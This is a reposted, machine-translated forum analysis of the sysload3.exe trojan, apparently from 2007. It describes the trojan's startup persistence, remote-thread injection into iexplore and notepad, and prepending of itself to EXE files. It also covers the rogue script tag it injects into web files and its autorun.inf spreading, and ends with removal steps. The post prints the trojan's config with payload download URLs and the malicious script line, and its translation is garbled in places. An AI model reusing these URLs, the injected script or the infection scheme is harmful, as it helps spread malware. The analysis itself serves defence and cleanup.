Sysload3.exe trojan virus Location Analysis and Removal Methods
Reproduced from the masterpiece of coding, a netizen from the Shui Mu community
Http://codinggg.spaces.live.com/blog/cns! 8ff03b6be1f29212! 689. Entry
Applicable to sysload3.exe v1.0.6: used to restore the infected exe program. For other infected ASP, aspx, htm, HTML, JSP, and PHP files, simply replace the feature string.
Http://mumayi1.999kb.com/pic/2007-04-02/b6z4d6al8r5e9d6t44dn.rar
Note: The space does not support the EXE format. download the file and change the Suffix from RAR to exe.
Before using the SDK, delete sysload3.exein the system directory to delete the dynamic libraries under the temporary directory with icesword. Current employee
When there are no iexplore.exeand notepad.exe processes in the server, you can run the recovery program.
Note: During running, do not run other programs. It is possible that the program you run is infected with viruses !!
I came back from work overtime yesterday afternoon and found that my behavior was quite strange. Looking at the task manager, several ie processes and several notepad processes are suspicious. Then I looked at the Registry and added the startup Item: sysload3.exe, which is under the Windows System directory. Alas, I don't need anti-virus software. Generally, when a trojan is in use, it is all done. However, this trojan is annoying and affects the use of it. The trojan program is so incredible. Users all know that there is interference. What are the Trojans! I don't know what the author thinks ~~
So annoying, let's fuck him! Don't worry, IDA is waiting. I analyzed version 1.0.6. The program logic is relatively simple. Let's see what he has done ~~
1. At the beginning, create a startup item in the Registry: System Boot check, adjust to the debug permission, and then create an ie.e.exeprocess and a notepad.exe process.
2. Naturally, code is injected into remote processes ~~, The author injection method is relatively simple. During the design, I changed my loading address, instead of using 0x400000. Instead, I used a very uncommon address (0x13150000 ), it is estimated that notepad and iexplore have been tested. You can confirm that the address is not occupied. Then, based on the PE information, obtain the required space size (0x7000), allocate the space from iexplore and notepad, and finally copy the entire program. Address correction is free of charge. Finally, it's the Trojan's favorite function: createremotethread ~~
3.6.2 after the job is finished, sysload3.exe will be useless. The next step is iexplore and notepad ~.
4. iexplore is working first. At this time, notepad also has an important task. It needs to check whether it is an ontology or an infected body. In case of an infected body, you need to release the pre-infection program so that it will not be discovered by the user. Then the thread waits for the notification (named event: mysignal ). What is iexplore doing at this time? Next, let's take a look.
5. iexplore (the name is really long, and I will call it ie later ~) First, create a name named mutex: mydownload, and tell the following brother: I am there, please rest ~. Create a mysignal event and set it to the signal-free state. Next, we officially started to work: The task of IE is to retrieve the latest configuration information of the virus file and update the local virus version based on the new configuration information. First, download the configuration file from http://a.2007ip.com/css.css. the config file must be named config.ini.
The format and notes of the configuration file are as follows:
[Config]
Version = 1.0.6
Num = 7; the number of tasks (up to 20) is shown below. Each task extracts the file and the local name is exe with the same name.
1 = http: // 61.153.247.76/cald/01.gif
2 = http: // 61.153.247.76/cald/02.gif
3 = http: // 61.153.247.76/cald/03.gif
4 = http: // 61.153.247.76/cald/04.gif
5 = http: // 61.153.247.76/cald/05.gif
6 = http: // 61.153.247.76/cald/06.gif
7 = http: // 61.153.247.76/cald/07.gif
Updateme = http://a.2007ip.com/5949645046.exe update sysload3.exe itself
Tongji = http://if.iloveck.com/test/tongji.htm; alas, statistics, the author thinks this thing so Nb? Also count ....
Hos = http://if.iloveck.com/test/hos.gif; it's amazing! The author has collected a lot of rogue website names, and gave them to me by the way when we planted Trojans.
These websites are also blocked. All records are recorded in the hosts file, all parsing costs! Although it is unclear that the author's intention is to fight against competitors (other Trojans, ~) Or is it true to serve the people, in any case, like the author ~~!! Although the trojan is killed, I will continue to use this function. It is estimated that the author will update it ~ Haha ~~
Okay. After all the tasks are completed, ie will take a break ~~
6. nopepad debut.
This bad guy is not doing good at first ~, From disk Z to disk A, a random file is infected, including EXE, ASP, aspx, htm, HTML, PHP, and so on. This trojan is so annoying to me.
A. The infection process of its EXE is as follows (do not do anything bad !) :
First, traverse all files. Find an EXE and check whether its last 4 bytes are 0x12345678. If yes, this is the brother, the next one.
What should I do if I find one that is not infected? Naturally, it is infected with him ~~ Hahaha ~~~. Note: Here is the key: Copy sysload3.exeand call it tempicon.exe. Why is it an icon? Don't worry. Now you can see the reason. When the tempicon is available, extract the icon resource of the Target Program and insert it into the tempicon. In this way, the tempicon looks like the target ~. In the following example, the target program should be kept, so that tempload.exe is available. This file copies the tempicon and then places the target program next to it. Finally, 8 pieces of recognition information are added. The first four bytes indicate the length of the Trojan, and the last four bytes indicate the preceding 0x12345678;
B. The processing of web-related files is similar. The temporary files are temphtml ~, Insert a rogue Javascript file in the middle: <SCRIPT src = http://macr.microfsot.com/Noindex.js> </SCRIPT>
After the entire hard disk is infected, it will not scan once every 50 seconds, and there will be no USB flash drives, floppy disks, or other drives mounted. After mounting, an autorun.infjob is generated under the root directory. Copy sysload3.exe, which is relatively simple.
Oh, it seems that the partition where the system directory is located is not traversed.
Well, finish the work!
This is the basic process ~. To recover the file, you only need to write a small program, traverse the EXE in the hard disk, and point out the length of sysload_stub according to the marker at the end of the file (the length of sysload_stub is 8-4 bytes at the bottom, you can recover the bird by checking whether the last 4 bytes are 0x12345678 and checking whether the infected file is used ~~~~ For other libraries such as gizo0.dll, lgsy0.dll, msxo0.dll, and rav1_dll, use icesword to detach them from the explorer process and delete them ~!
In general, the idea of adding a configuration file to a Trojan is quite good ~ If you develop a new Trojan, let them download it ~ Haha. However, when the author uses creatfile for many times, the return value is always 0, which is strange ~ Isn't it invalid_handle_value ??? The possibility that the author does not know should be ruled out. In the use of findfirstfile, the author uses invalid_handle_value for comparison. I read less books. If anyone knows, please leave a message to tell me. Thank you ~~.
The analysis process is quite troublesome ~ Fortunately, I don't forget to attach a joke: I will by one BMW this year! If the author can use this to get to BMW, will it make us feel much happier ~~ Hey ~~
The attachment is a static file. Pay attention to the upgrade.
By Cui yanqu
~~~~~~~~~~
Attachment 2 is the kill of Jiang Min.
[This post was last edited by teyqiu]
Attachment
Downloads: 367
Sysload3_killer_20070402.zip (21.15 KB)
Downloads: 316
Aniwormkiller.zip (123.11 KB
